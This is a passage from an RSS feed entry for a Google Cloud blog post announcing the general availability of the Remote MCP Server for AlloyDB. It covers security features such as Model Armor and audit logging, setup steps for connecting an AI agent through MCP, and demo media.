&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Model Armor protection&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/model-armor?e=13802955"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Armor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; provides optional prompt and response security to screen and filter data, defending against prompt injections or accidental data exfiltration.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Audit logging&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Every query, action, and tool call goes to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/audit"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Audit Logs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, giving security teams a full audit trail.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Let's see it in action: A quick demo&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Getting started with the AlloyDB Remote MCP server is a straightforward process. To see it in action in your own environment, you can follow our &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/alloydb-ai-mcp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;new Codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which guides you through these essential steps:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;API &amp;amp; environment prep&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Enable the AlloyDB, &lt;/span&gt;&lt;a href="https://cloud.google.com/products/compute?e=13802955"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Compute Engine&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://cloud.google.com/products/gemini-enterprise-agent-platform?e=13802955"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; APIs in your Google Cloud project.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Provision your database&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Deploy your AlloyDB cluster, create your database, and import your sample data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Enable data access API&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Permit the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/use-alloydb-mcp#execute-sql"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Data Access API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on your AlloyDB instance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Connect the agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Configure your MCP client by providing the remote endpoint (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;https://alloydb.googleapis.com/mcp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;). Pass your Google Cloud IAM credentials using an OAuth 2.0 bearer token in the HTTP Authorization header.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once the connection is established, your agent can provide reliable, grounded answers to complex business questions using your real-time operational data. By performing introspection queries, the agent automatically understands your database schema – including tables and columns – enabling it to construct sophisticated joins and queries to fulfill user requests accurately.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/1_-_Setup.gif"
        
          alt="1 - Setup"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once your agent has access to the AlloyDB toolset, it can execute queries, analyze operational trends, and dynamically rank text data using AlloyDB &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/ai-query-engine-landing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.RANK()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/2_-_Rank.gif"
        
          alt="2 - Rank"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security remains paramount: the Remote MCP Server for AlloyDB integrates seamlessly with Model Armor. This provides protection against sensitive data leaks, even if the agent’s service account possesses broad access permissions within the database. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/3_-_Secure.gif"
        
          alt="3 - Secure"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Watch the full demo below!&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=-dPZ19fGM20"
      data-glue-modal-trigger="uni-modal--dPZ19fGM20-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/maxresdefault_ZNMrpaE.max-1000x1000.jpg);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;How to connect AI agents directly to your enterprise data: Introducing the AlloyDB remote MCP server&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal--dPZ19fGM20-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="-dPZ19fGM20"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=-dPZ19fGM20"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What's next&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By enabling agents to interact securely with transactional data, we are embracing an architecture where AI agents can reliably access and act upon your enterprise’s single source of truth. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to build? Discover AlloyDB with a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/free-trial-cluster"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;30-day free trial&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and dive into the &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/alloydb-ai-mcp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Remote MCP for AlloyDB Codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to start powering your enterprise agentic applications today.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Mon, 01 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/data-analytics/alloydb-remote-mcp-server-ga-secure-ai-agent-access-to-your-data/</guid><category>AI &amp; Machine Learning</category><category>Data Analytics</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>The fully-managed Remote MCP Server for AlloyDB is now Generally Available</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/data-analytics/alloydb-remote-mcp-server-ga-secure-ai-agent-access-to-your-data/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Paul Ramsey</name><title>Product Manager, AlloyDB, Cloud SQL, Google Cloud</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Gleb Otochkin</name><title>Cloud Advocate, Databases, Google Cloud</title><department></department><company></company></author></item></channel></rss>